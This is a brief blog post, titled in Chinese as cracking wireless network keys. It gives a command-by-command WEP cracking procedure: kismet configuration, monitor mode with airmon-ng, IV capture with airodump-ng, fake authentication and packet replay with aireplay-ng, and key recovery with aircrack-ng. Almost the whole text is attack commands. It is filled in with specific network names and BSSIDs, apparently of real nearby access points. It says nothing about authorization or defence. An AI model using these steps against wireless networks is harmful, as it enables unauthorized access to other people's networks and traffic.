天天看点

破解无线网络密钥

iwconfig

cd /user/local/etc

vim kismet.conf

find "source=" then change as follows:source=<wireless-driver>,<wireless-name>,<channel>

finally input cammand:kismet,then show shell-kosole ,press "s" and "c",so you can select item.

<ap_essid>:EASIER-WIRELESS-EX,WHOME

<ap_bssid>:00:15:E9:07:B0:AE,00:14:78:63:19:E4

<channel>:6

<wireless-driver>:ipwraw,RT73

<wireless-name>:wifi0,rausb0

<wireless-bssid>:00:18-DE:81:67:DE,00:1D:0F:01:C6:F8

1.modprobe -r iwl3945

modprobe <wireless-driver>

2.Change to monitor mode  airmon-ng

airmon-ng start <wireless-name>

3.capture only channel 6,WEP IVs  attention:<channel> must be pair others' channel

airodump-ng <wireless-name> -c <channel> --bssid <ap_bssid> --ivs -w dump

4.fack authentication

aireplay-ng -10 -e <ap_essid> -a <ap_bssid> -h <wireless-bssid> <wireless-name>

5.send packets as following

aireplay-ng -3 -b <ap_bssid> -h <wireless-bssid> -x 600 <wireless-name>

6.crack

aircrack-ng -x -0 *.ivs